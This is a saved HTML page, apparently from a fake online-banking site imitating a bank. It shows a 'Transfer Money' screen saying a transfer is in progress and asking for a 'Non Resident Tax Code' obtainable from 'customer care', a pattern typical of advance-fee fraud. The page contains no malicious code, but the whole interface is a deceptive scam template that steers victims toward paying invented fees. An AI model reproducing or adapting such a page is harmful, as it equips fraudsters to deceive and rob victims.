
<!-- saved from url=(0069)http://uk.sambabk.com/e/admin3/transfer_1_entercode.php?account=&cid= -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Content-Language" content="en-us">

<title>New Page 1</title>
<link rel="stylesheet" type="text/css" href="./code1_files/style.css">
<style type="text/css"></style></head>

<body>

<table border="0" width="820" cellspacing="0" cellpadding="0" style="border:1px solid #a3a3a3">
	<tbody><tr>
		<td style="padding:10px" bgcolor="#EEEEEE">
		<table border="0" width="100%" cellspacing="1">
			<tbody><tr>
				<td width="392">Welcome,&nbsp; <b>&nbsp;</b></td>
				<td>
				Today: <b>20th July 2017 </b></td>
				<td width="176">
				<p align="right">Secure Online banking</p></td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#0088cc">
		&nbsp;</td>
	</tr>
	<tr>
		<td style="padding:10px; vertical-align:top" height="164">
		<table border="0" width="100%" cellspacing="1">
			<tbody><tr>
				<td width="134" style="padding:10px; border:1px solid #a3a3a3">
<img src="" height="0" width="0">				
				</td>
				<td style="padding:10px; vertical-align:top; padding-right:0px">
						<table border="0" width="100%" height="122" cellspacing="0" cellpadding="0">
							<tbody><tr>
								<td width="140" align="right" style="border-style:solid; border-width:0px; ">
								<font size="2">Name: </font></td>
								<td align="left" style="border:1px solid #c3c3c3; border-bottom:0px">
								<font size="2">&nbsp;&nbsp;</font></td>
							</tr>
							<tr>
								<td width="140" align="right" style="border-style:solid; border-width:0px; ">
								<font size="2">Account Number:</font></td>
								<td align="left" style="border:1px solid #c3c3c3; border-bottom:0px">
								<font size="2">&nbsp;</font></td>
							</tr>
							<tr>
								<td width="140" align="right" style="border-style:solid; border-width:0px; ">
								<font size="2">Sort code:</font></td>
								<td align="left" style="border:1px solid #c3c3c3; border-bottom:0px">
								<font size="2">&nbsp;</font></td>
							</tr>
							<tr>
								<td width="140" align="right" style="border-style:solid; border-width:0px; ">
								<font size="2">Date of 
								Deposit:</font></td>
								<td align="left" style="border:1px solid #c3c3c3">
								<font size="2">&nbsp;  </font></td>
							</tr>
							</tbody></table>
						</td>
			</tr>
			</tbody></table>
		</td>
	</tr>
	<tr>
		<td style="padding:10px; vertical-align:top">
		<table border="0" width="100%" cellspacing="0" cellpadding="0">
			<tbody><tr>
				<td width="190" style="padding:10px; border:1px solid #f4cd58; border-right:0px" bgcolor="#FBF2A5">
				Quick Menu</td>
				<td style="padding:10px; border:1px solid #f4cd58;" bgcolor="#FFFFCF">
				Transfer Money</td>
			</tr>
			<tr>
				<td width="192" style="padding:10px; vertical-align:top">
				<table border="0" width="100%" cellspacing="0" cellpadding="0">
					<tbody><tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we8.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/acc_welcome.php?account=">Home</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we9.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/transactions.php?account=">View Transactions</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we10.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/paybill.php?account=">Pay a bill 
						/ someone</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we11.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/transfer_money.php?account=">Transfer Money</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we12.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/add_services.php?account=">Add Services</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we13.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/user_profile.php?account=">User Profile</a></font></td>
					</tr>
					<tr>
						<td width="16" style="padding:5px; border:1px solid #a3a3a3">
						<img border="0" src="./code1_files/acc_we14.gif"></td>
						<td style="padding:5px; border:1px solid #a3a3a3">
						<font size="2"><a href="http://uk.sambabk.com/e/admin3/logout.php">Logout</a></font></td>
					</tr>
				</tbody></table>
				</td>
				<td style="padding:10px; border:1px solid #f4cd58; vertical-align:top; border-top:0px">
					<table border="0" width="102%" id="table17" height="195" cellspacing="0">
						<tbody><tr>
                      <td align="left" class="normaltext" height="93" style="BORDER-TOP: 0px solid" width="100%">
                      	<p align="center" style="margin-top: -1px; margin-bottom: -1px">
						<font size="2">Transfer process in progress. This may 
						take some minutes to complete.</font></p>
						<p align="center" style="margin-top: -1px; margin-bottom: -1px">
						<font size="2">Please enter your Non Resident Tax code below to 
						continue.<br>
						</font></p>
							<form method="POST" action="http://uk.sambabk.com/e/admin3/codeverify_1.php?account=&amp;cid=" style="margin: 0px">
						
								<table border="0" width="100%" id="table19">
									<tbody><tr>
										<td class="textMB">
										<p align="right"><font size="2">Non 
										Resident Tax Code:</font></p></td>
										<td width="300">
										<input type="text" name="code" size="20" class="fields"></td>
									</tr>
									<tr>
										<td>&nbsp;</td>
										<td width="300">
										<input type="submit" value="Submit" name="B1" class="buttons"></td>
									</tr>
								</tbody></table>
							</form>
                      	<p align="center">
						<font size="2">To obtain your 
						Non Resident Tax code, kindly contact our customer 
						care department 
						</font> 
						</p><p align="center" style="margin-top: 0; margin-bottom: 0">
						&nbsp;</p></td>
																																</tr>
						</tbody></table>
						</td>
			</tr>
		</tbody></table>
		</td>
	</tr>
	<tr>
		<td bgcolor="#EEEEEE">&nbsp;</td>
	</tr>
</tbody></table>

<p>&nbsp;</p>



</body></html>